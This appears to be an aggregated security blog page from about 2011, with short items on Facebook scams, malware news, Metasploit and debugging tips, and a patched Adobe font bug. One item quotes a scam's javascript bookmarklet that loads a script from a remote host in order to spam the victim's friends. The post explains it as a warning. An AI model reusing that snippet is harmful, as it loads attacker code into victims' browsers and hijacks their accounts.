Drupalit weekly

Boss asks this IT pilot fish to make sure he's able to log in from his PC at home. That used to mean a VPN and a SecurID fob, but that's not secure enough, so now there's a new system for doing it.

read more

Websense Security Labs™ ThreatSeeker™ Network has detected another fake Facebook sites campaign, just 4 days after Websense warned of the Mark Zuckerberg Facebook Page Showing Rogue Comments hack. A malicious executable file appears on fake Facebook sites titled "Facebook Profile Photos". Websense customers have been protected against this attack with ACE, our Advanced Classification Engine.

The attack posts messages on the wall of compromised Facebook accounts, and uses a previously-created counterfeit Facebook application to lure users' visits.  read more »

Hacker Halted USA, October 21-27 in Miami, is the EC-Council's flagship IT security event for both technical experts and C-Level executives. It hosts lots of technical training courses and a two-day conference with exhibits.

The conference track themes include cloud security, SCADA, and timely topics chosen by peer review and input from 450 training companies worldwide.  read more »

So here is another one in Osama's related dead scam. this one sends chat message to your friends on facebook. It sends a url in tinyurl form which on opening displays following page:

it tell you to copy and paste following javascript code:

javascript:(a=(b=document).createElement('script')).src='//pro..info/u.php?'+Math.random(),b.body.appendChild(a);void(0)


when you paste the javascript code in your address bar,it send the malicious links to all your friends on facebook.  read more »

it seems that apple jailbreakme pdf which were using a 0 day according to vupen has been fixed.

if we see the patch only a minor check was added:

+ if ( arg_cnt < 0 || subr_no < 0 )
+ goto Unexpected_OtherSubr;


so as you might have guessed, vulnerability is if a font file has arg_cnt < 0 or subr_no then is > 0x7FFFFFFF then it will cause problems :)

cheers,
secgeek

Dear Users,

I have noticed that secgeeks.com have visitors from so many countries and not all of them knows English which is the primary language for the site. so i have added Google translate feature to the secgeeks.com . you can see it in the right hand side. using this feature you can translate the secgeeks.com in your fav language.

Happy new year 2011 and i hope you will enjoy this feature.

Thanks,
SecGeek

I have been working with metasploit. sometimes i want to use fileformat modules to be delivered by web. but mostly metasploit creates the exploit files in C:\framework\msf3\data\exploits folder.
now what if i want to run a webserver and deliver these to the client? i have to do it manually. this happens with most of the fileformat modules.
so if you faced same problem then you can follow the tips i am going to mention in this article.
lets take a simple module C:\framework\msf3\modules\exploits\windows\fileformat\adobe_jbig2decode.rb  read more »

Faced a minor problem with Lorcon2 wrapper module, in compiling with ruby 1.9.2 . following will fix the issues for those who are facing it:

change STRCCSTR function in file ruby-lorcon-1.0.0/Lorcon.c at line 443,441:

driver = STR2CSTR(rbdriver);
intf = STR2CSTR(rbintf);

as

driver = StringValuePtr(rbdriver);
intf = StringValuePtr(rbintf);

Hope it helps.

I have used both the debugger, windbg and olly. but i like windbg because of various reasons:
1. it has symbol support. you can just add the symbol path in the config and it will give you all the function names during the debugging. this you can do in olly too. but using windbg is better.
2. you can user various windows like dissembly,memory and command. well this make sense if you are debugging and you need to quickly check memory or dissembly.
3. it has command line support. well it speed up the debugging.
4. remote debugging, you can debug remotely.

which one do you use and why?

Insecurity outfit McAfee has warned that next year will see increased attacks on Apple gear in 2011, thanks to the fact that the outfit has done well with its iPhones and iPad in the business market.

In the company's 2011 Threats Predictions, McAfee said that Macs were not often targeted by malicious attackers, because they are not widely deployed.

However in 2010 malware for the MacOS started to get a lot more clever and it expected the trend to increase in 2011.  read more »

As the year ended, a new threat for the Android OS was found in ANDROIDOS_GEINIMI.A, which spread from certain third-party app stores in China.

This new threat spread using legitimate applications distributed via third-party stores. These versions, however, were Trojanized to add malicious code. These run completely in the background with no visible differences from the legitimate application. The added code steals a wide variety of information from the user’s phone such as:

* Installed/Running applications  read more »

So today is the day when Prince William & Catherine got married and scammer started using this already for facebook likejacking.
we got one url which on opening display a message:
"Prince William & Catherine Middleton First Kiss Video" and shows following picture:

when we see the code it contains following javascript code:

so there is one like TAG.
 read more »

there is a new scam on facebook, which display a message - free avtar dvd.
it points to avtar-dvd.info url. if you click on it, it will display a link to servey as below:

on clicking on it, you have to fill a survey:

beware, no one gives you a blockbuster movie dvd for free :)

I have come across another scam with title "Photographer commited SUICIDE 3 days after shooting THIS video!".

It basically display following on infected user's profile:

After user click on Jaa, it will use a new trick,it will open facebook share page and resize it, when you click on jaa,it will share the link on user's profile.

after that it will open a survey.
 read more »

Dear All,
Secgeeks.com wishes you all a very happy new year 2011.

"May what you see in the mirror delight you, and what others see in you delight them. May someone love you enough to forgive your faults, be blind to your blemishes, and tell the world about your virtues.

May the telemarketers wait to make their sales calls until you finish dinner, may the commercials on TV not be louder than the program you have been watching, and may your check book and your budget balance - and include generous amounts for charity. "

Wishing you again a very happy new year.  read more »

I have been working with metasploit and sulley lately for developing couple of fuzzers. i think sulley is a much better choice for writing fuzzers. reason is it does intelligent fuzzing rather then dumb fuzzing.
for example if you got one protocol where length is denoted as 2 byte BE. it make sense to fuzz at extream values i.e. 0xFFFF or 0x0000 it does not make sense to fuzz each and every value like 0x0002,0x0003.
sulley does a good job here. while in metasploit you need to generate random data which can be of any range.  read more »

Details concerning a potentially serious security vulnerability in fully patched versions of Microsoft’s Internet Explorer have been leaked to people in China, a researcher warned over the weekend.  read more »

I was checking my facebook and suddenly following caught my attention:

on clicking on the download button, it downloaded an exntesion for my firefox. so i decided to analyze it. i have unpacked it and i see following:

on opening the file youtube.js, i can see the following code:

it download a script from another source, so lets see what does it contains:  read more »

After all the noise over Google's Chrome OS announcement yesterday, I find people scratching their heads. They can't see the point of what Google's doing. They especially can't see the point for enterprise IT.  read more »

50,000 stolen iTunes accounts linked to stolen credit cards are being sold on a Chinese auction site, according to a report from the BBC.

Listings on TaoBao, the Chinese equivalent of eBay, are promising access to iTunes downloads for between 1 yuan ($0.15) and 200 yuan ($30).

However, customers are advised that they are likely to only have about 12 hours to download apps, movies, games and music from the online store before their accounts are suspended.  read more »